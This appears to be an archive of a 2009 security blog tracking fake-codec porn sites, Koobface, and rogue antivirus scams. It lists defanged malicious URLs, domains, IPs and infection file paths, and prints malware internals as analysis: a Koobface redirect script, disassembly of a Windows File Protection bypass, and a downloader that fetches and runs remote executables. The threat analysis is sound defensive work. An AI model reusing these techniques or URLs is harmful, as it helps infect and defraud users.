Monday, December 7, 2009

Fake codec used by porn site

Here's another porn site distributing malware under the guise of video codecs:

hxxp://adultsvideo.cn/

Unsuspecting users wanting to view the adult videos are tricked into downloading and installing the fake codec.

The fake codec can be downloaded from this url:

hxxp://freebigutilites.com/ActiveX-Video-Codec.45092.exe

The server spits out files that have different MD5s each time.

ThreatExpert report here

Update:

Here's another site that purports to host "Free Full Lenght Movie" porn clips and uses fake video codecs in order to lure unsuspecting users into downloading and installing their rogue antivirus software:

hxxp://freeanalsextubemovies.com/video1483/porn/

Clicking anywhere on the video screen area gives us the following link to a file named video.exe:

hxxp://homeamateurclips.com/video/video.exe

Which is a fake antivirus software under the Security Tool family of Fake AVs.

Tuesday, November 3, 2009

MaCatte scareware fools users by masquerading as McAfee

rogue2

MaCatte Antivirus is a rogue av that attempts to impersonate McAfee scanners in order to scam users.

This scareware has been seen to be using a bogus My Computer online scan similar to ones we've seen here, here and here.

rogue6

The online scan can be seen on this url:

hxxp://proscan5.info/25/26-088wLzQzL1EzL==

The downloader being served from this url is time-sensitive and will not work after a period of time. A session ID of some sort is embedded on the binary executable itself. After such time has elapsed, the downloader tells the user to contact MaCatte Antivirus support people. This prevents reverse-engineers from replicating the infection and gathering samples for analysis.

Presence of these files / folders would signal infection from this scareware:
C:\Documents and Settings\All Users\Application Data\msca
C:\Documents and Settings\All Users\Application Data\msca\MaCatte.ico
C:\Documents and Settings\All Users\Application Data\msca\mcull.exe
C:\Documents and Settings\All Users\Application Data\msca\msc.exe
C:\Documents and Settings\All Users\Application Data\msca\Viruses.dat
C:\Documents and Settings\All Users\Application Data\Microsoft\Media\WPtect.dll
C:\Documents and Settings\All Users\Desktop\MaCatte.lnk
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte\MaCatte.lnk


Unsuspecting users are set back from their hard-earned money by a hefty $99.

Stay away from these rogue apps.

Wednesday, October 21, 2009

Sysinternals Releases Disk2vhd v1.0

Sysinternals has recently released Disk2vhd that "simplifies the migration of physical systems into virtual machines (p2v)."

Disk2vhd is a utility that creates VHD (Virtual Hard Disk - Microsoft’s Virtual Machine disk format) versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines (VMs)


More here.

Thursday, October 15, 2009

Sysguard / Winifighter Clones

Here are some screenshots of the members of this scareware family:

[gickr.com]_6c803672-8a5f-25e4-5109-31b55ebdf362

Beware of these rouge apps.

Tuesday, October 13, 2009

Winifighter Clone: TrustFighter

RogueAntiSpyware.Winifighter_TrustFighter6

Another scareware has been spotted in the wild and it calls itself TrustFighter. This is a recent addition to the Winifighter family of scareware.

Same as other members of this family of scareware, as in a previous post, TrustFighter creates heaps of junk binary files in the %systemroot% and %system% directories.

Sample junk files are the following:

%systemroot%\51c0vzr24975.dll
%systemroot%\51cbthreatz1991.ocx
%systemroot%\524699py69fz.bin
%systemroot%\525z1vi9us4e4.cpl
%systemroot%\5294viz115.exe
%systemroot%\5eddaddwar9167z.dll
%systemroot%\5ezast95l495.dll
%systemroot%\5ezdaddware2359.cpl
%systemroot%\5z09s9yware545.cpl
%systemroot%\5z56th5eat19149.bin
%systemroot%\5z85thief22759.cpl
%systemroot%\5z99addware2835.ocx
%systemroot%\5z9bba5kdoor525.dll
%systemroot%\5z9cth5ef13559.cpl
%systemroot%\5zfdaddware950.bin
%systemroot%\5zfesparse709.exe
%systemroot%\6169th5zf99.ocx
%systemroot%\6210spywa5e192z.ocx
%system%\1905szea51146.cpl
%system%\190979iru57z7.ocx
%system%\190cszywa591879.exe
%system%\19105vizus1c.bin
%system%\19179virusz65.ocx
%system%\1930thief97z5.cpl
%system%\19559spamboz6bb.ocx
%system%\1958stezl2595.cpl
%system%\195b5hreat39894z.exe
%system%\19645worm7zd.exe
%system%\1969spz715.bin
%system%\1977zhacktool54d.cpl
%system%\19792troz5aa.bin
%system%\1987th5z92904.cpl


Here are some domains participating in this campain:

securityannounce(dot)com
securityadjust(dot)com
bestmalwaredetect(dot)com
pcprotectzone(dot)com
trustfighter(dot)com


Unsuspecting users get set back by $49.95 from their hard-earned money.

Friday, September 25, 2009

Bogus MS Update

We have been receiving bogus emails claiming to be coming from Microsoft:

...public distribution of this Update through the official website »www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all users Microsoft Windows OS.
as the computer set to receive notifications when new updates are available, which you have received this notice.

We have seen emails containing one of the following links:
hxxp://www2.sinel.com/microsoftupdate.html
hxxp://mail1.e-corecorporation.com/default.htm


They seem to be compromized websites being used by the bad guys in order to facilitate this attack.

The page default.html from hxxp://mail1.e-corecorporation.com/default.htm uses a refresh-type redirect to this url:
hxxp://0xc0.0xdc.0x6e.0xe4/microsoftupdate.html

The page microsoftupdate.html from sinel.com and 0xc0.0xdc.0x6e.0xe4 both execute another refresh-type redirect in order to download a Zeus malware with filename update09.exe.

Interestingly enough, this attack uses 0xc0.0xdc.0x6e.0xe4 to serve the malware. This IP-address translates to 192.220.110.228, which in turn resolves to summit102.summitdesign.net, another possibly compromised website used in this attack.

The presence of the following files/folders may indicate signs of infection:
%System%\sdra64.exe
%Temp%\tmp.exe
%System%\lowsec\


More here.

Tuesday, September 22, 2009

Another Shameless SEO based on Atlanta Flooding

Users Googling "Atlanta flood pictures" receive a yet another SEO attack, using a possibly compromised legitimate Australian website hosting restaurants in the famous Bondi area.

Here's a screenshot of a google search result:
atlanta_flood_google

A Fiddler capture shows us the redirections:
atlanta_fiddle

So we go from
hxxp://idrb.com/pdf_files/atlanta-flood-pictures.html
>hxxp://06d.ru/t.php
>>hxxp://read-cnn2.com/?pid=207&sid=de9f8f
>>>hxxp://winfixscanner7.com/scan1/?pid=207&engine=pHTyzjTyMzEyOS44Mi4xOTAmdGltZT0xMjUuNgAMPAVN


An installer named Soft_207.exe will be presented for download, which is a variant of the Total Security family of Fake AVs.

At the moment, the following domains have been observed to have been involved in this attack:

winfixscanner7(dot)com
15scanner(dot)com


These domains resolve to the following IP addresses:
89.47.237.55
89.248.174.61
213.163.89.60


But knowing the trend in scareware, there could be heaps more domains being created as we speak.

Friday, September 18, 2009

Koobface on the Move, Serving Scareware !!

We have been seeing a lot of new movement on the koobface front Lately.

koob_fiddle

As koobface-serving domains are being taken down as early as the good guys discover them, the bad guys are at it and they respond by registering new ones. At the moment, their, C&C server is hosted in China with IP Address 61.235.117.83.

The bad guys are still using a fake facebook website, as well as posing as a fake codec, in order to distribute koobface.

fake_facebook

Clicking anywhere on the page, presents us with a file named setup.exe. Here are some of the IPs being used to distribute koobface:

koob_script

115.130.27.204
123.202.200.84
151.204.31.67
196.206.65.53
221.126.0.105
24.215.207.229
41.238.76.198
61.93.34.23
67.206.253.52
68.47.48.240
69.18.107.115
69.254.215.173
70.122.242.250
70.212.232.126
71.116.37.213
71.130.216.179
71.194.236.32
71.80.105.40
72.13.138.210
72.190.87.208
75.181.171.110
75.251.94.44
76.119.98.22
76.22.160.28
76.23.203.64
81.192.192.160
98.140.58.163
98.244.224.140
98.26.40.38
99.22.74.229


The javascript component being by used by koobface, remains bascically the same as before

And as before, koobface is still serving up scareware. From time to time, users are presented with a My Computer online scan, going through these domains:

rogue

gotrioscan(dot)com
plazec(dot)info


At some instances, we also get these warnings:

hardware_error
Internet_Antivirus_Pro

At the moment, these warnings are serving Internet Antivirus Pro.

Update:
Koobface has been going at it and here's another one that spoofs youtube and serves koobface malware as a fake codec:

hxxp://71.197.170.226/d=www.marcellaburnard.com/0x3E8/view/console=yes/?go

Thursday, August 27, 2009

Porn site distributes scareware

Another website has recently been spotted to be serving up malware in the guise of fake video codecs.

This one praises itself as "The Best Nude Celebrity Movie Site"
hxxp://alyssafan.net/1.html

face_codec

But in order to watch the any video, we would need to download and install their "Certified ActiveX video codec (VAC codec) use to protect content Copyrights"

The fake fake codec can be downloaded here:
hxxp://alyssafan.net/Mediacodec_v4.8.exe

One of the components used in this attack is an onfuscated javascript file that can be found in the %temp% folder.

obfuscated

This script translates to:

deobfuscated

This script downloads:
hxxp://ue4x08f5myqdl.cn/u3.exe

Which then gives us scareware Safety Center:

safetycenter

Beware of fake video codecs!

Friday, August 21, 2009

Scareware asking for ransom: System Security

system_security_scan

Scareware is BIG business. They use heaps of scare tactics in order to convince unsuspecting users into buying rogue applications. But here's one that does a bit more than just scaring.

System Security terminates almost all running processes. This basically prevents us from using our computers. More importantly, this hinders execution of tools necessary to investigate the infection and aid in removal of this rogue app.

Back in the day, in order to evade detection and removal, malware writers have targeted security-related applications. They have a black list of applications including (but not limited to) the following:

avast.exe
avp.exe
cmd.exe
icesword.exe
kav.exe
regedit.exe
taskmgr.exe


But now they block even the most harmless Windows applications such as calc.exe and notepad.exe. But not all applications should be terminated, because that basically means no Windows. No Windows means no profit so the bad guys need basic Windows functionality. Which tells us that they have probably stopped using blacklisting and shifted to whitelisting instead. They now have a list of applications that they would allow to be executed in the system.

Here's part of some disassembly taken from a sample of System Security, showing us evidence of whitelisting:

Rogue app takes a snapshot of all the processes in the system:

.rsrc:140B4B4F push edi
.rsrc:140B4B50 push 2
.rsrc:140B4B52 call CreateToolhelp32Snapshot
.rsrc:140B4B57 mov [ebp+hObject], eax
...
.rsrc:140B4B79 push ecx
.rsrc:140B4B7A push eax
.rsrc:140B4B7B mov [ebp+var_64C], 22Ch
.rsrc:140B4B85 call Process32FirstW
...
.rsrc:140B4BAB push [ebp+dwProcessId] ; dwProcessId
.rsrc:140B4BB1 push 0 ; bInheritHandle
.rsrc:140B4BB3 push 1FFFFFh ; dwDesiredAccess
.rsrc:140B4BB8 call ds:OpenProcess


It then terminates the processes not found in the white list:
.rsrc:140B4C00 push 0FFFFFFFFh ; uExitCode
.rsrc:140B4C02 push edi ; hProcess
.rsrc:140B4C03 call ebx ; TerminateProcess


and displays this message as a notification in the system tray:
.rsrc:14039998 aApplicationCan: ; DATA XREF: sub_140B4ADD+16A
.rsrc:14039998 unicode 0,
.rsrc:14039998 unicode 0,
.rsrc:14039998 dw 0Ah
.rsrc:14039998 unicode 0, ,0
.rsrc:14039A5E align 10h
.rsrc:14039A60 aWarning: ; DATA XREF: .rsrc:140104BF
.rsrc:14039A60 ; sub_140B4ADD+1DB ...
.rsrc:14039A60 unicode 0, ,0
.rsrc:14039A72 align 4


systemsecurity

It then resumes processing the snapshot created earlier and the cycle continues:
.rsrc:140B4CDF lea eax, [ebp+var_64C]
.rsrc:140B4CE5 push eax
.rsrc:140B4CE6 push [ebp+hObject]
.rsrc:140B4CEC call Process32NextW


Here's the list of applications that the scareware allows:
.rsrc:14046A48 off_14046A48 dd offset aAlg_exe ; DATA XREF: sub_140B49CF+26
.rsrc:14046A48 ; "alg.exe"
.rsrc:14046A4C dd offset aCsrss_exe ; "csrss.exe"
.rsrc:14046A50 dd offset aCtfmon_exe ; "ctfmon.exe"
.rsrc:14046A54 dd offset aExplorer_exe ; "explorer.exe"
.rsrc:14046A58 dd offset aServices_exe ; "services.exe"
.rsrc:14046A5C dd offset aSlsvc_exe ; "slsvc.exe"
.rsrc:14046A60 dd offset aSmss_exe ; "smss.exe"
.rsrc:14046A64 dd offset aSpoolsv_exe ; "spoolsv.exe"
.rsrc:14046A68 dd offset aSvchost_exe ; "svchost.exe"
.rsrc:14046A6C dd offset aSystem ; "system"
.rsrc:14046A70 dd offset aIexplore_exe ; "iexplore.exe"
.rsrc:14046A74 dd offset aLsass_exe ; "lsass.exe"
.rsrc:14046A78 dd offset aLsm_exe ; "lsm.exe"
.rsrc:14046A7C dd offset aNvsvc_exe ; "nvsvc.exe"
.rsrc:14046A80 dd offset aWininit_exe ; "wininit.exe"
.rsrc:14046A84 dd offset aWinlogon_exe ; "winlogon.exe"
.rsrc:14046A88 dd offset aWscntfy_exe ; "wscntfy.exe"
.rsrc:14046A8C dd offset aWuauclt_exe ; "wuauclt.exe"


As we can see, System Security is more than just scareware. You won't be able to properly use your computer unless you buy the rogue app. Sounds more like ransomeware to me.

But, now that we know that it uses whitelisting, we can do a little work around and bypass this technique. We can rename a copy of the tools that we need to run as one of the whitelisted applications and voila! We've already taken one step into regaining full use of our infected computer.

Thursday, August 20, 2009

Rogue AV Clone: Windows Protection Suite

WindowsProtectionSuite-site

Another scareware has been spotted and it calls itself Windows Protection Suite.

You can get Windows Protection Suite from one of these urls:

hxxp://searchscanner.net/?p=WKmimHVlbXCHjsbIo22EfYCIt1POo22YXZmK0qR0qay9sYmbm5h2lpd9fXCHodjSbpRelWZsmGGZYWPMU9jSzKKsl3OWh9esb2VraWhpbWyWX5aMlJNq
hxxp://linewebsearch.com/?p=WKmimHVlbXCHjsbIo22EfYCIt1POo22YXZmK0qR0qay9sYmbm5h2lpd9fXCHodjSbpRelWZsmGGZYWPMU9jSzKKsl3OWh9esb2VraWhpbWyWX5aMlJNq
hxxp://linewebsearch.com/?p=WKmimHVlaGuHjsbIo22Eh4uLt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6YU9janW1eZWpslGGbZmGXkonZ0Zqop5uikomtpXFqZmxtbWmaYZyfV5OQcQ%3D%3D
hxxp://linewebsearch.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
hxxp://guardinfo.net/?p=WKmimHVlbm2HjsbIo22EfYCIt1POo22cU9LXoKith6Swz9KwoFqbnZxxmpinc4rapZxql2OemI6WaWeZY5WK2J%2Bgo6vKnpRfpqd2ZWppaHCUXpeaaFaQl28%3D


It uses the same tactic as seen on earlier posts here and here where the website claims to scan the unsuspecting user's computer, detects heaps of infections, and offers a bogus solution.

scan

Looking at the installed scareware we find out that Windows Protection Suite is nothing but a clone of Windows Security Suite.

WPS

Even their websites are clones:

WPS_WEB

hxxp://windowsprotectionsuite.com
hxxp://windowssecuritysuite.com

Wednesday, August 19, 2009

This summary is not available. Please click here to view the post.

Thursday, August 13, 2009

Social engineering trick leads to Rogue AV: MacroVirus

I was reading a blog about a Rogue AV then I noticed a suspicious comment on it:

tiny_comment

It the user was recommending an antispyware program and gave us the following url:
www(dot)tinyurl(dot)com/qlft9c

Following the link, tinyurl does its magic and we are directed to:

hxxp://macrovirus(dot)com/?hop=starbasi

macrovirus

If we believe everything we see and hear, we'll be downloading and installing a scareware:

macrovirus_run

Here we can see that the bad guys are clearly taking advantage of the url shortening service from tinyurl.com.

Also, you might notice, there's a striking resemblance between the following:

bassey edet
and
hxxp://macrovirus(dot)com/?hop=starbasi

This is probably giving us a hint as to how the bad guys get paid.

If you got this scareware, remove it immediately.

Tuesday, August 11, 2009

Rogue AV: Winifighter

winfighter

We've talked about digital clutter on a previous post.

But this one's a real bugger. Winifighter creates heaps of junk binary files in the %systemroot% and %system% directories. The filenames, the contents, and filesize are all random. The names, however, contains bits and pieces taken from malware names such as the following:

backdoor
not a virus
spy
trojan
virus
worm


This one also, spoofs the Windows Security Center to give itself that authentic feel and advises unsuspecting users to register Winifighter.

winifighter_windowssecuritycentre

Ad of course we also have those ever so genuinely adorable warning messages:

fakealert1
fakealert2

As always, I advise everyone to steer clear of these Rogue AVs.

Monday, August 10, 2009

Facebook: Rogue AV Farm?

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here's a screenshot of a spoofed Facebook website:

koob1

We are presented by a fake codec alert and unsuspecting users usually download and install the Koobface malware:

koob2

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to the all good guys out there this site has been taken down. But the bad guys have responded and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq


The strings are random, and so are the names of the javascript files being executed.

Here's what the javascript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;


Since the domain kukuruku-290709(dot)com has been brought down already, we'll soon most likely see new ones emerge to host koobface.

One of the payloads of koobface is downloading other malware, and currently it is serving the fake  AV called System Security.

system_security_scan

A few weeks prior to today, there has been a lot of buzz about Facebook's Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.

Thursday, August 6, 2009

Rogue AV: Antivirus Plus

Here's another Rogue AV out there, and it's being served by more than one domain:

antivirusplus1

Here's a list of some of the domains used to host this Rogue AV:

addedantiviruslive(dot)com
addedantivirusonline(dot)com
addedantivirusstore(dot)com
easyaddedantivirus(dot)com
freeantivirusplus09(dot)com
goodantivirusplus(dot)com
i-antivirusplus(dot)com
internetantivirusplus(dot)com
mybestantivirusplus(dot)com
myplusantiviruspro(dot)com
nextantivirusplus(dot)com
realantivirusplus09(dot)com
realbestantivirusplus(dot)com
yesantivirusplus(dot)com


antivirusplus

Stay away from these rogue domains and block them if you have any means of doing so.

Wednesday, August 5, 2009

Rogue App: System Cleaner

I visited this rogue domain:

hxxp://antivirussecurescannerv3.com

antivirussecurescannerv3.com

The website proceeded to show me that it is scanning my machine for system errors and that it is doing a very wonderful job because it found heaps of problems on my machine and it is very eager to fix it.

To give the website some kind of authentic feel, it also showed me which browser I am using, my operating system, and my IP address.

It was also offering 60% discount on the product. Isn't that a good deal?

Now, if the dubious scanning and the overall feel of the website did not give away its real intentions, and if we are to be lulled into buying their software, well... hold on a minute!

If you notice that on my screenshot, the rogue website was giving some errors about the Windows TEMP folder, Internet Explorer temp files. But how can that be? As I mentioned on a previous post, I am not running Windows!

As usual, unsuspecting users get ripped off for a crappy software. So be careful!

Monday, August 3, 2009

Malware foils Windows File Protection

I came across a malware that replaces %system%\comres.dll which in turn runs the malware each time this module library is run.

This file is actually protected by the Windows File Protection feature which is introduced in Windows 2000 here

According to this microsoft article


Windows File Protection (WFP) prevents programs from replacing critical Windows system files. Programs must not overwrite these files because they are used by the operating system and by other programs. Protecting these files prevents problems with programs and the operating system.


In this post, we'll be looking at how a malware bypasses the Windows File Protection feature in order to replace the critical system file %system%\comres.dll with a copy of the malware.

The malware first disables the Windows File Protection feature (yes, it can be disabled!):


PUSH 0 ; /IsShown = 0
PUSH Avidm_dl.00BBAB7C ; |DefDir = ""
PUSH Avidm_dl.00AC54D8 ; |Parameters = "/REVERT"
PUSH EAX ; |C:\WINDOWS\system32\sfc.exe
PUSH Avidm_dl.00AC54D0 ; |Operation = "open"
PUSH 0 ; |hWnd = NULL
CALL DWORD PTR DS:[; \ShellExecuteA
...
PUSH ECX ; /pHandle
PUSH 0F003F ; |Access = KEY_ALL_ACCESS
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC5498 ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
CALL DWORD PTR DS:[; \RegOpenKeyExA
MOV EAX,DWORD PTR SS:[ESP+10]
LEA EDX,DWORD PTR SS:[ESP+14]
PUSH 4 ; /BufSize = 4
PUSH EDX ; |0xffffff9d
PUSH 4 ; |ValueType = REG_DWORD
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC548C ; |ValueName = "SfcDisable"
PUSH EAX ; |hKey
MOV DWORD PTR SS:[ESP+2C],-63 ; |
CALL DWORD PTR DS:[; \RegSetValueExA
MOV ECX,DWORD PTR SS:[ESP+10]
PUSH ECX ; /hKey
CALL DWORD PTR DS:[; \RegCloseKey


The malware then saves a copy of %system%\sfc_os.dll as %system%\sfc_my.dll:


PUSH 1 ; /FailIfExists = TRUE
REPNE SCAS BYTE PTR ES:[EDI] ; |
MOV ECX,EBP ; |
DEC EDI ; |
SHR ECX,2 ; |
REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
MOV ECX,EBP ; |
LEA EAX,DWORD PTR SS:[ESP+120] ; |
AND ECX,3 ; |
PUSH EAX ; |new filename: C:\WINDOWS\system32\sfc_my.dll
REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; |
LEA ECX,DWORD PTR SS:[ESP+228] ; |
PUSH ECX ; |existing filename: C:\WINDOWS\system32\sfc_os.dll
CALL DWORD PTR DS:[] ; \CopyFileA


It then loads the newly-copied file to get the address of an exported API via Ordinal #5, an undocumented API SetSfcFileException to disable Windows File Protection for %system%\comres.dll, Windows COM services:


PUSH EDX ; /C:\WINDOWS\system32\sfc_my.dll
CALL DWORD PTR DS:[] ; \LoadLibraryA
PUSH 5 ; /ProcNameOrOrdinal = #5
PUSH EAX ; |hModule
CALL DWORD PTR DS:[] ; \GetProcAddress
...
PUSH EDX ; c:\windows\system32\comres.dll
PUSH 0
CALL EBP ; sfc_my.#5


ordinal5

The malware then saves the original comres.dll as comresdk.dll, removes comres.dll in %dllcache%, and it is now ready to use the name comres.dll in %system%:


PUSH EDX ; /newname: comresdk.dll
PUSH EAX ; |oldname: comres.dll
CALL ; \rename
...
PUSH EDX ; /path=C:\WINDOWS\system32\dllcache\comres.dll
CALL ; \remove
...
PUSH 1 ; /FailIfExists = TRUE
PUSH EAX ; |NewFilename: C:\WINDOWS\system32\comres.dll
PUSH ECX ; |ExistingFilename:
CALL DWORD PTR DS:[>; \CopyFileA


There we have it folks, the malware foiled the Windows System File Protection feature using perfectly legitimate and readily available methods.

Thursday, July 30, 2009

Rogue AV: Antivirus Plus

Here's another Rogue AV using the same animated system scan on the internet browser as the one in a previous post

aplus_scan

In some instances, Antivirus Plus uses this animated scan instead:

aplus_scan2

It also uses one of those warnings that look oh so genuinely sincere:

aplus_warning

Then of course downloading and installing the rogue app give us the usual scan results:

antivirusplus

Here's a list of domains currently serving this rogue app:


hxxp://adoimi.cn
hxxp://yourguardpro.cn
hxxp://yourcheckpoisonpro.cn
hxxp://yourfriskviruspro.cn
hxxp://antivirusplus09.com
hxxp://antivirusplus-ok.com
hxxp://addedantiviruspro.com


aplus

Because of the same animated system scan that they use, I reckon System Security and Antivirus Plus are two related rogue apps.

Wednesday, July 29, 2009

Digital clutter

In relation to a previous post, visting the malicious domain

hxxp://zusojbktvo.cn/fin.php

leads us into downloading

hxxp://woqyymmptn.cn/setup/setup.exe

This malware in turn runs the Microsoft HTML Application host (mshta.exe) to execute hxxp://enjnzdfmts.cn/33t.php

00400256 >/$ 6A 00 PUSH 0 ; /IsShown = 0
00400258 |. 6A 00 PUSH 0 ; |DefDir = NULL
0040025A |. 68 39024000 PUSH setup.00400239 ; |Parameters = "http://enjnzdfmts.cn/33t.php"
0040025F |. 68 2F024000 PUSH setup.0040022F ; |FileName = "mshta.exe"
00400264 |. 6A 00 PUSH 0 ; |Operation = NULL
00400266 |. 6A 00 PUSH 0 ; |hWnd = NULL
00400268 |. E8 81010000 CALL ; \ShellExecuteA


The url hxxp://enjnzdfmts.cn/33t.php gives us a page with an obfuscated javascript:

33t

Which translates to:

33t.deobfuscated

The script basically creates and executes files in an attempt to download and install more malware on the affected machine. In the process, it creates a ftp connection to woqyymmptn.cn with the following cretentials:


username: qqq
password: 123456


ftp

It also creates a batch file that creates numerous Scheduled Tasks that run mshta.exe to execute hxxp://woqyymmptn.cn/33t.php which basically does the same thing as the above script.

jobs

hxxp://12-2005-search.com/cool.exe is then downloaded and executed as %Temp%\675.exe. The download link, however, is no longer active.


004002CD . 68 90000000 PUSH 90
004002D2 . 891C24 MOV DWORD PTR SS:[ESP],EBX
004002D5 . 68 90000000 PUSH 90
004002DA . C70424 0401000>MOV DWORD PTR SS:[ESP],104
004002E1 . 68 D0034000 PUSH
004002E6 . 58 POP EAX
004002E7 . E8 00000000 CALL setup.004002EC
004002EC $ 830424 06 ADD DWORD PTR SS:[ESP],6
004002F0 . FFE0 JMP EAX ;
004002F2 E8 DB E8
004002F3 01 DB 01
004002F4 00 DB 00
004002F5 00 DB 00
004002F6 . 0008 ADD BYTE PTR DS:[EAX],CL
004002F8 . 5D POP EBP
004002F9 . 33C9 XOR ECX,ECX
004002FB . 8A4D 00 MOV CL,BYTE PTR SS:[EBP]
004002FE . 8BFB MOV EDI,EBX
00400300 . 03F8 ADD EDI,EAX
00400302 . BE 08024000 MOV ESI,setup.00400208 ; ASCII "675.exe"
00400307 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00400309 . 51 PUSH ECX
0040030A . 51 PUSH ECX
0040030B . 53 PUSH EBX
0040030C . E8 23000000 CALL setup.00400334
00400311 . 68 74 74 70 3A>ASCII "http://"
00400318 . 31 32 2D 32 30>ASCII "12-2005-search.c"
00400328 . 6F 6D 2F 63 6F>ASCII "om/cool.exe",0
00400334 $ 51 PUSH ECX
00400335 . 68 E2034000 PUSH
0040033A . 58 POP EAX
0040033B . E8 00000000 CALL setup.00400340
00400340 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400344 . FFE0 JMP EAX
00400346 . 51 PUSH ECX
00400347 . 53 PUSH EBX
00400348 . 68 DC034000 PUSH
0040034D . 58 POP EAX
0040034E . E8 00000000 CALL setup.00400353
00400353 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400357 . FFE0 JMP EAX


The malware uses random filenames as we can see from the filenames used in the embedded script above. These are possibly ramdonly-generated by the PHP code behind it.

In effect, the malware creates heaps of batch files, text files, blank .exe files (unavailable download), and .job files on the affected system. Talk about heavy digital clutter!